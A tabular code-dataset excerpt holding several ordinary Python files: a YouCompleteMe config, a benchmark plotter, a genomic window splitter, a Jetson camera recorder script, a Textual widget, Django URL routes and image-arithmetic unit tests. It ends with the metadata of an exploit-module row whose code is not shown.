hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8755cd1b05ceffa0493eb022ef6a315245e9e2ab | 332 | py | Python | .ycm_extra_conf.py | solson/spideros | a9c34f3aec10283d5623e821d70c2d9fb5fce843 | [
"0BSD"
] | 9 | 2016-07-07T18:12:27.000Z | 2022-03-11T06:41:38.000Z | .ycm_extra_conf.py | solson/spideros | a9c34f3aec10283d5623e821d70c2d9fb5fce843 | [
"0BSD"
] | null | null | null | .ycm_extra_conf.py | solson/spideros | a9c34f3aec10283d5623e821d70c2d9fb5fce843 | [
"0BSD"
] | null | null | null | import os
def FlagsForFile(filename, **kwargs):
    """Return compiler flags for YouCompleteMe by asking SCons for them.

    Runs `scons -Q ycm=1` from the project root (the directory containing
    this file) and appends flags that force YCM to treat every file,
    headers included, as C++.
    """
    project_root = os.path.dirname(os.path.abspath(__file__))
    os.chdir(project_root)
    scons_output = os.popen('scons -Q ycm=1').read()
    flags = scons_output.split() + ['-x', 'c++']
    return {
        'flags': flags,
        'do_cache': True
    }
| 23.714286 | 69 | 0.60241 | 45 | 332 | 4.333333 | 0.755556 | 0.061538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003891 | 0.225904 | 332 | 13 | 70 | 25.538462 | 0.754864 | 0.189759 | 0 | 0 | 0 | 0 | 0.11985 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
875cb8cbaa0fe6b6a1719f73429c58c0603f7d8b | 1,168 | py | Python | contrib/performance/graph.py | eventable/CalendarServer | 384444edb1966b530bc391789afbe3fb9cd6fd3e | [
"Apache-2.0"
] | 1 | 2017-02-18T19:22:19.000Z | 2017-02-18T19:22:19.000Z | contrib/performance/graph.py | eventable/CalendarServer | 384444edb1966b530bc391789afbe3fb9cd6fd3e | [
"Apache-2.0"
] | null | null | null | contrib/performance/graph.py | eventable/CalendarServer | 384444edb1966b530bc391789afbe3fb9cd6fd3e | [
"Apache-2.0"
] | null | null | null | ##
# Copyright (c) 2010-2015 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import sys
from matplotlib import pyplot
import numpy
from benchlib import load_stats
def main():
    """Plot benchmark sample times as grouped bar charts.

    Loads statistics from the files named on the command line and renders
    one colored bar series per input file, labelled via the legend.
    """
    fig = pyplot.figure()
    ax = fig.add_subplot(111)
    data = [samples for (_ignore_stat, samples) in load_stats(sys.argv[1:])]
    bars = []
    # Bug fix: `iter(...).next` is Python 2 only; use the built-in next().
    # Behavior is unchanged: more than six inputs still exhausts the colors.
    colors = iter('rgbcmy')
    w = 1.0 / len(data)
    xs = numpy.arange(len(data[0]))
    for i, s in enumerate(data):
        bars.append(ax.bar(xs + i * w, s, width=w, color=next(colors))[0])
    ax.set_xlabel('sample #')
    ax.set_ylabel('seconds')
    ax.legend(bars, sys.argv[1:])
    pyplot.show()
| 28.487805 | 76 | 0.689212 | 181 | 1,168 | 4.40884 | 0.624309 | 0.075188 | 0.032581 | 0.0401 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022364 | 0.196062 | 1,168 | 40 | 77 | 29.2 | 0.827476 | 0.494007 | 0 | 0 | 0 | 0 | 0.036649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87600684cfa7503e26d347dadd2d740320b15700 | 4,813 | py | Python | limix/mtset/core/splitter_bed.py | fpcasale/limix | a6bc2850f243fe779991bb53a24ddbebe0ab74d2 | [
"Apache-2.0"
] | null | null | null | limix/mtset/core/splitter_bed.py | fpcasale/limix | a6bc2850f243fe779991bb53a24ddbebe0ab74d2 | [
"Apache-2.0"
] | null | null | null | limix/mtset/core/splitter_bed.py | fpcasale/limix | a6bc2850f243fe779991bb53a24ddbebe0ab74d2 | [
"Apache-2.0"
] | null | null | null | import sys
import h5py
import pdb
import scipy as SP
import scipy.stats as ST
import scipy.linalg as LA
import time as TIME
import copy
import warnings
import os
import csv
def splitGeno(
        pos,
        method='slidingWindow',
        size=5e4,
        step=None,
        annotation_file=None,
        cis=1e4,
        funct=None,
        out_file=None):
    """
    split geno into windows and store output in csv file

    Args:
        pos:             genomic position in the format (chrom,pos)
        method:          method used to split the windows:
                         'slidingWindow': uses a sliding window
                         'geneWindow':    uses windows centered on genes
        size:            window size used in slidingWindow method
        step:            moving step used in slidingWindow method
        annotation_file: annotation file for the geneWindow method
        cis:             cis-window size for the geneWindow method
        funct:           gene-function filter for the geneWindow method
        out_file:        output csv file

    Returns:
        (nWnds, nSnps): number of windows and per-window SNP counts

    Raises:
        NotImplementedError: the 'geneWindow' method is not wired up yet
    """
    assert method in ['slidingWindow', 'geneWindow'], 'method not known'
    # create folder if it does not exist
    out_dir, fname = os.path.split(out_file)
    if (out_dir != '') and (not os.path.exists(out_dir)):
        os.makedirs(out_dir)
    # calculate windows using the indicated method
    if method == 'slidingWindow':
        nWnds, nSnps = splitGenoSlidingWindow(
            pos, out_file, size=size, step=step)
    else:
        # Bug fix: the old code fell through with `pass` and then raised a
        # confusing NameError on the return statement below; fail explicitly.
        raise NotImplementedError('geneWindow splitting is not implemented yet')
    return nWnds, nSnps
def splitGenoSlidingWindow(pos, out_file, size=5e4, step=None):
    """
    split into windows using a sliding criterion

    Args:
        pos:      genomic position matrix, columns (chrom, pos)
        out_file: tab-separated output file, one row per non-empty window
        size:     window size
        step:     moving step (default: 0.5*size)
    Returns:
        wnd_i: number of windows
        nSnps: vector of per-window number of SNPs
    """
    # Local numpy: the module-level `scipy as SP` numpy aliases
    # (SP.unique, SP.where, SP.array) were removed in modern SciPy.
    import numpy as np
    if step is None:
        step = 0.5 * size
    chroms = np.unique(pos[:, 0])
    wnd_i = 0
    nSnps = []
    # Bug fix: the csv writer's file handle was opened inline and never
    # closed; `with` guarantees the window file is flushed and closed.
    with open(out_file, 'w', newline='') as fhandle:
        wnd_file = csv.writer(fhandle, delimiter='\t')
        for chrom_i in chroms:
            Ichrom = pos[:, 0] == chrom_i
            idx_chrom_start = np.where(Ichrom)[0][0]
            pos_chr = pos[Ichrom, 1]
            start = pos_chr.min()
            pos_chr_max = pos_chr.max()
            # slide the window until it passes the last SNP on this chromosome
            while start <= pos_chr_max:
                end = start + size
                Ir = (pos_chr >= start) * (pos_chr < end)
                _nSnps = Ir.sum()
                if _nSnps > 0:
                    idx_wnd_start = idx_chrom_start + np.where(Ir)[0][0]
                    nSnps.append(_nSnps)
                    line = np.array([wnd_i, chrom_i, start, end,
                                     idx_wnd_start, _nSnps], dtype=int)
                    wnd_file.writerow(line)
                    wnd_i += 1
                start += step
    nSnps = np.array(nSnps)
    return wnd_i, nSnps
def splitGenoGeneWindow(
        self,
        annotation_file=None,
        cis=1e4,
        funct='protein_coding'):
    """
    split into windows based on genes
    """
    # NOTE(review): despite taking `self`, this is a module-level function in
    # this file; it reads self.chrom / self.pos / self.info, so it looks
    # lifted from a Splitter class — confirm the intended owner.
    # 1. load annotation
    assert annotation_file is not None, 'Splitter:: specify annotation file'
    try:
        f = h5py.File(annotation_file, 'r')
        geneID = f['geneID'][:]
        gene_chrom = f['chrom'][:]
        gene_start = f['start'][:]
        gene_end = f['end'][:]
        gene_strand = f['strand'][:]
        gene_function = f['function'][:]
        f.close()
    except BaseException:
        # NOTE(review): on a read failure this only prints and falls through,
        # so the loop below raises NameError on the unset gene arrays.
        print('Splitter:: format annotation file not valid')
    # if funct is not None, it has to be a list
    # NOTE(review): `funct != list` compares against the `list` type and is
    # always True for a string; presumably `not isinstance(funct, list)`
    # was intended — same outcome for the default string argument.
    if funct is not None and funct != list:
        funct = [funct]
    windows = []
    nSnps = []
    Igene = []
    # 2. calculates windows
    for gene_i in range(geneID.shape[0]):
        # skip genes whose functional class is not requested
        if funct is not None:
            if gene_function[gene_i] not in funct:
                Igene.append(False)
                continue
        # cis-window around the gene body: [start - cis, end + cis]
        wnd = [
            gene_chrom[gene_i],
            gene_start[gene_i] - cis,
            gene_end[gene_i] + cis]
        Ir = (self.chrom == wnd[0]) * \
            (self.pos >= wnd[1]) * (self.pos <= wnd[2])
        _nSnps = Ir.sum()
        # NOTE(review): minSnps / maxSnps are not defined anywhere in this
        # file, so this branch raises NameError when reached — they were
        # probably meant to be keyword parameters.
        if _nSnps >= minSnps and _nSnps <= maxSnps:
            windows.append(wnd)
            nSnps.append(_nSnps)
            Igene.append(True)
        else:
            Igene.append(False)
    Igene = SP.array(Igene)
    # record per-gene metadata for the retained windows
    self.info['nSnps'] = SP.array(nSnps)
    self.info['geneID'] = geneID[Igene]
    self.info['gene_start'] = gene_start[Igene]
    self.info['gene_end'] = gene_end[Igene]
    self.info['gene_strand'] = gene_strand[Igene]
    self.info['gene_function'] = gene_function[Igene]
    return SP.array(windows)
if __name__ == "__main__":
    # Ad-hoc driver for the 1000 Genomes chr22 test data.
    data = './../data/1000G_chr22/chrom22'
    window_size = 1e4
    # NOTE(review): precompute_windows is not defined in this file; running
    # this entry point raises NameError — possibly splitGenoSlidingWindow
    # (or a removed helper) was meant. Confirm before use.
    precompute_windows(data, size=window_size, plot=True)
| 30.462025 | 101 | 0.571161 | 603 | 4,813 | 4.412935 | 0.271973 | 0.052612 | 0.024427 | 0.025554 | 0.094701 | 0.021796 | 0 | 0 | 0 | 0 | 0 | 0.012262 | 0.322252 | 4,813 | 157 | 102 | 30.656051 | 0.803495 | 0.212757 | 0 | 0.107143 | 0 | 0 | 0.079663 | 0.007885 | 0 | 0 | 0 | 0 | 0.017857 | 1 | 0.026786 | false | 0.008929 | 0.098214 | 0 | 0.151786 | 0.008929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8760be4a49dcada94b6edc683340f8b51aad145b | 4,021 | py | Python | python/birdVid/jetsonvid.py | plertvilai/birdCam_jetson | 8e74bbc81c289b3e0158edbd471fda0f3ed2b9fb | [
"MIT"
] | null | null | null | python/birdVid/jetsonvid.py | plertvilai/birdCam_jetson | 8e74bbc81c289b3e0158edbd471fda0f3ed2b9fb | [
"MIT"
] | null | null | null | python/birdVid/jetsonvid.py | plertvilai/birdCam_jetson | 8e74bbc81c289b3e0158edbd471fda0f3ed2b9fb | [
"MIT"
] | null | null | null | import os
import os
import signal
import subprocess
import time
import argparse


def _str2bool(value):
    """Parse a boolean CLI value.

    Bug fix: the original parser used ``type=bool``, for which any non-empty
    string — including "False" — is truthy. Accept the usual spellings.
    """
    if isinstance(value, bool):
        return value
    return str(value).strip().lower() in ('1', 'true', 'yes', 'y', 'on')


def build_parser():
    """Build the command-line parser for the video controller."""
    parser = argparse.ArgumentParser(description="NVIDIA JETSON GSTREAMER VIDEO CONTROLLER")
    parser.add_argument("-f", "--format", type=str, default="mp4", help="Select video format: mp4 or avi")
    parser.add_argument("-t", "--duration", type=int, default=10, help="Select duration of recording in seconds")
    parser.add_argument("-o", "--output", type=str, default=" ", help="Output filename without extension")
    parser.add_argument("-s", "--shutter", type=int, default=1000, help="Exposure time in microseconds")
    parser.add_argument("-ag", "--again", type=int, default=4, help="Analog gain")
    parser.add_argument("-dg", "--dgain", type=int, default=4, help="Digital gain")
    parser.add_argument("-dc", "--dualcam", type=_str2bool, default=False, help="Select True to run dual cameras")
    parser.add_argument("-fps", "--framerate", type=int, default=30, help="Select framerate in fps")
    parser.add_argument("-ww", "--width", type=int, default=4032, help="Image width. Default 4032.")
    parser.add_argument("-hh", "--height", type=int, default=3040, help="Image height. Default 3040.")
    return parser


def _pipeline(sensor_id, encoder, extension, args, output_name):
    """Render one gst-launch pipeline string for the given sensor."""
    return (
        "gst-launch-1.0 -e nvarguscamerasrc sensor-id=%d "
        "gainrange=\"%d %d\" ispdigitalgainrange=\"%d %d\" exposuretimerange=\"%d %d\" "
        "! \"video/x-raw(memory:NVMM),width=%d,height=%d,framerate=%d/1\" !"
        " %s ! filesink location=%s_%d.%s") % (
        sensor_id, args.again, args.again, args.dgain, args.dgain,
        args.shutter * 1000, args.shutter * 1000,
        args.width, args.height, args.framerate,
        encoder, output_name, sensor_id, extension)


def build_commands(args, output_name):
    """Return the (cmd0, cmd1) gst-launch pipelines for sensors 0 and 1.

    Raises:
        ValueError: if args.format is neither mp4 nor avi.

    Bug fix: the original avi branch built the parameterized pipelines and
    then unconditionally clobbered them with hard-coded 4032x3040 commands
    using the raw (possibly blank) --output value; that dead overwrite is
    removed so the avi path honors the CLI parameters like the mp4 path.
    """
    fmt = args.format.lower()
    if fmt == 'mp4':
        encoder = "nvv4l2h264enc ! h264parse ! mp4mux"
    elif fmt == 'avi':
        encoder = "nvjpegenc ! avimux"
    else:
        raise ValueError("Invalid requested video format. Please select MP4 or AVI")
    cmd0 = _pipeline(0, encoder, fmt, args, output_name)
    cmd1 = _pipeline(1, encoder, fmt, args, output_name)
    return cmd0, cmd1


def main():
    """Record for --duration seconds from one or two cameras, then stop."""
    args = build_parser().parse_args()
    # A blank --output means "timestamp the recording".
    output_name = str(time.time()) if args.output == " " else args.output
    try:
        cmd0, cmd1 = build_commands(args, output_name)
    except ValueError as err:
        print(err)
        quit()
    print(cmd0)
    if args.dualcam:
        print(cmd1)
    process0 = subprocess.Popen(cmd0, shell=True)
    if args.dualcam:
        process1 = subprocess.Popen(cmd1, shell=True)
    # Extra 4 s grace period for pipeline startup before sending SIGINT.
    time.sleep(args.duration + 4)
    os.killpg(os.getpgid(process0.pid), signal.SIGINT)
    if args.dualcam:
        os.killpg(os.getpgid(process1.pid), signal.SIGINT)


if __name__ == "__main__":
    main()
876363de67d7e19c2bc42088f35ad5bbb3552735 | 1,301 | py | Python | textual_widgets/status_bar.py | Cvaniak/RichWatch | 9190feff4771e2ab66bfc935c18b08832675ae0a | [
"MIT"
] | 19 | 2021-11-06T13:37:06.000Z | 2022-03-03T13:30:14.000Z | textual_widgets/status_bar.py | Cvaniak/RichWatch | 9190feff4771e2ab66bfc935c18b08832675ae0a | [
"MIT"
] | null | null | null | textual_widgets/status_bar.py | Cvaniak/RichWatch | 9190feff4771e2ab66bfc935c18b08832675ae0a | [
"MIT"
] | null | null | null | from textual.widget import Widget
from datetime import datetime, timedelta
import threading
from rich.panel import Panel
from rich.align import Align
class StatusBar(Widget):
    """Widget showing the auto-refresh state and time since the last update."""

    # Class-level defaults; instances overwrite these via reset_timer().
    delta_time: timedelta = timedelta(seconds=0)
    last_updated: datetime = datetime.now()
    auto_refresh: bool = False

    def __init__(self, trigger: threading.Event) -> None:
        self.trigger = trigger
        super().__init__()

    def update_refresh(self) -> None:
        """Fire the refresh trigger once more than 10 s have elapsed."""
        if self.auto_refresh and self.delta_time.total_seconds() > 10:
            self.trigger.set()
            self.reset_timer()
        self.refresh()

    def reset_timer(self) -> None:
        """Restart the elapsed-time counter from now."""
        self.last_updated = datetime.now()
        self.delta_time = timedelta(seconds=0)

    def on_mount(self) -> None:
        # Poll five times a second so the displayed elapsed time stays fresh.
        self.set_interval(0.2, self.update_refresh)

    def toggle_auto_refresh(self) -> None:
        """Flip auto-refresh on or off."""
        self.auto_refresh = not self.auto_refresh

    def render(self) -> Panel:
        self.delta_time = datetime.now() - self.last_updated
        status_color = 'green' if self.auto_refresh else 'red'
        # [:-7] trims the microseconds from the timedelta's repr.
        elapsed = str(self.delta_time)[:-7]
        text = (
            f"[bold]Auto Refresh: [{status_color}]{self.auto_refresh}[/]\n"
            f"[bold]Last Update: [cyan]{elapsed}"
        )
        return Panel(Align.center(text, vertical="middle"))
| 31.731707 | 82 | 0.64412 | 166 | 1,301 | 4.861446 | 0.355422 | 0.109046 | 0.092937 | 0.042131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007056 | 0.23751 | 1,301 | 40 | 83 | 32.525 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0.112221 | 0.049193 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.15625 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8763ae338bb7899bfcebd3fd05cc212794853da9 | 550 | py | Python | cnki2bibtex/misc/Configure.py | SNBQT/CNKI_2_BibTeX | 433a7cd5e3b3904cf1ce08943acf0219a46d7f5b | [
"MIT"
] | null | null | null | cnki2bibtex/misc/Configure.py | SNBQT/CNKI_2_BibTeX | 433a7cd5e3b3904cf1ce08943acf0219a46d7f5b | [
"MIT"
] | null | null | null | cnki2bibtex/misc/Configure.py | SNBQT/CNKI_2_BibTeX | 433a7cd5e3b3904cf1ce08943acf0219a46d7f5b | [
"MIT"
] | null | null | null | import os
import re
def setIDFormat(idFormat):
    """Persist the citation-ID format to ~/.cnki2bib.cfg."""
    config_path = os.path.join(os.path.expanduser('~'), r".cnki2bib.cfg")
    content = "[settings]\nid_format = {}".format(idFormat)
    with open(config_path, "w", encoding="utf-8") as config_file:
        config_file.write(content)
def getIDFormat():
    """Read the configured ID format from ~/.cnki2bib.cfg; default "title"."""
    config_path = os.path.join(os.path.expanduser('~'), r".cnki2bib.cfg")
    if not os.path.exists(config_path):
        return "title"
    with open(config_path, "r", encoding="utf-8") as config_file:
        content = config_file.read()
    return re.search(r"id_format = (.*)", content).group(1)
| 28.947368 | 70 | 0.610909 | 74 | 550 | 4.513514 | 0.5 | 0.08982 | 0.083832 | 0.107784 | 0.365269 | 0.275449 | 0.275449 | 0.275449 | 0.275449 | 0.275449 | 0 | 0.011416 | 0.203636 | 550 | 18 | 71 | 30.555556 | 0.751142 | 0 | 0 | 0.142857 | 0 | 0 | 0.158182 | 0.038182 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8766a6e9f00642b5a5fdfbdbd3dd11843e43e5fa | 679 | py | Python | pygmyui/pygmy/urls.py | ParikhKadam/pygmy | eecab36204d41f2c446b86e1e71d9e768b54dd1d | [
"MIT"
] | 571 | 2017-11-17T06:12:21.000Z | 2022-03-04T11:58:23.000Z | pygmyui/pygmy/urls.py | ParikhKadam/pygmy | eecab36204d41f2c446b86e1e71d9e768b54dd1d | [
"MIT"
] | 49 | 2017-11-19T08:25:14.000Z | 2022-02-10T07:55:27.000Z | pygmyui/pygmy/urls.py | ParikhKadam/pygmy | eecab36204d41f2c446b86e1e71d9e768b54dd1d | [
"MIT"
] | 104 | 2018-01-11T20:47:42.000Z | 2022-02-27T17:35:48.000Z |
from django.conf.urls import url
# NOTE(review): TemplateView is imported but not used in this module.
from django.views.generic.base import TemplateView

from . import views

# URL routes for the pygmy link-shortener UI.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^dashboard$', views.dashboard, name='dashboard'),
    url(r'^shorten$', views.link_shortener, name='link_shortener'),
    # Retrieve an already-shortened link by its code.
    url(r'^shorten/(?P<code>[a-zA-Z0-9]+)$', views.get_short_link,
        name='get_short_link'),
    url(r'^link/secret$', views.link_auth, name='link_auth'),
    url(r'^check$', views.check_available, name='link_available'),
    # Catch-all: resolve a short code to its target URL.
    url(r'^(?P<code>[a-zA-Z0-9]+)$', views.link_unshorten, name='shorten'),
    # NOTE(review): this pattern differs from the one above only by allowing
    # '+' in the code; for codes without '+', the previous route matches
    # first, so 'linkstats' appears reachable only via codes containing '+'
    # — confirm this is intentional.
    url(r'^(?P<code>[a-zA-Z0-9+]+)$', views.short_link_stats, name='linkstats')
]
8767256081fc71f1d084a564f165d56367f8cd9c | 2,008 | py | Python | test/test_basic_arithmetics.py | jerry-le/computer-vision | bd81a0561680aa976c21c7902cf929257ffeedda | [
"MIT"
] | 1 | 2018-10-14T02:05:58.000Z | 2018-10-14T02:05:58.000Z | test/test_basic_arithmetics.py | jerry-le/computer-vision | bd81a0561680aa976c21c7902cf929257ffeedda | [
"MIT"
] | 1 | 2018-10-05T01:48:48.000Z | 2018-10-05T01:48:48.000Z | test/test_basic_arithmetics.py | jerry-le/computer-vision | bd81a0561680aa976c21c7902cf929257ffeedda | [
"MIT"
] | null | null | null | import cv2
import numpy as np
from unittest import TestCase
from arithmetics import basic_arithmetics as ba
class TestBasicArithmetic(TestCase):
    """Unit tests for the basic image-arithmetic helpers."""

    def setUp(self):
        self.image_path = '../asserts/images/elena.jpg'

    def test_add_gray_success(self):
        gray = cv2.imread(self.image_path, 0)
        gray_plus_10 = ba.add(gray, 10)
        self.assertEqual(gray_plus_10.shape, gray.shape)
        self.assertTrue(np.average(gray_plus_10) > np.average(gray))

    def test_add_gray_with_color_input(self):
        img = cv2.imread(self.image_path)
        # Bug fix: the old try/except pattern silently passed when NO
        # exception was raised; assertRaises enforces that it actually does.
        with self.assertRaises(Exception) as ctx:
            ba.add(img, 10)
        self.assertEqual(str(ctx.exception), 'Image input must be gray')

    def test_subtract_gray_success(self):
        gray = cv2.imread(self.image_path, 0)
        gray_subtract_10 = ba.subtract(gray, 10)
        self.assertEqual(gray_subtract_10.shape, gray.shape)
        self.assertTrue(np.average(gray_subtract_10) < np.average(gray))

    def test_multiple_gray_success(self):
        gray = cv2.imread(self.image_path, 0)
        gray_time_2 = ba.multiple(gray, 2)
        self.assertEqual(gray_time_2.shape, gray.shape)
        self.assertTrue(np.average(gray) < np.average(gray_time_2))

    def test_subtract_2_images_success(self):
        image_path1 = '../asserts/images/right.jpg'
        image_path2 = '../asserts/images/right_2.jpg'
        gray1 = cv2.imread(image_path1, 0)
        gray2 = cv2.imread(image_path2, 0)
        gray_diff = ba.subtract2images(gray1, gray2)
        # Bug fix: assertTrue(a, b) treated the second argument as a failure
        # message and asserted nothing about equality; use assertEqual.
        self.assertEqual(gray_diff.shape, gray1.shape)

    def test_subtract_2_images_with_different_size(self):
        image_path1 = '../asserts/images/elena.jpg'
        image_path2 = '../asserts/images/right.jpg'
        gray1 = cv2.imread(image_path1, 0)
        gray2 = cv2.imread(image_path2, 0)
        # Bug fix: same silent-pass pattern as above — require the exception.
        with self.assertRaises(Exception) as ctx:
            ba.subtract2images(gray1, gray2)
        self.assertEqual(str(ctx.exception), 'Images must be the same size')
| 37.886792 | 72 | 0.667829 | 278 | 2,008 | 4.600719 | 0.215827 | 0.056294 | 0.060985 | 0.056294 | 0.63878 | 0.485536 | 0.347928 | 0.347928 | 0.258014 | 0.190774 | 0 | 0.039795 | 0.224104 | 2,008 | 52 | 73 | 38.615385 | 0.78113 | 0 | 0 | 0.295455 | 0 | 0 | 0.094124 | 0.068227 | 0 | 0 | 0 | 0 | 0.318182 | 1 | 0.159091 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8767c80a7746be422c50eab9a0a2b3e1924aecc9 | 2,006 | py | Python | modules/vulnerabilities/apache/apache-flink-unauth-rce.py | cckuailong/pocsploit | fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a | [
"MIT"
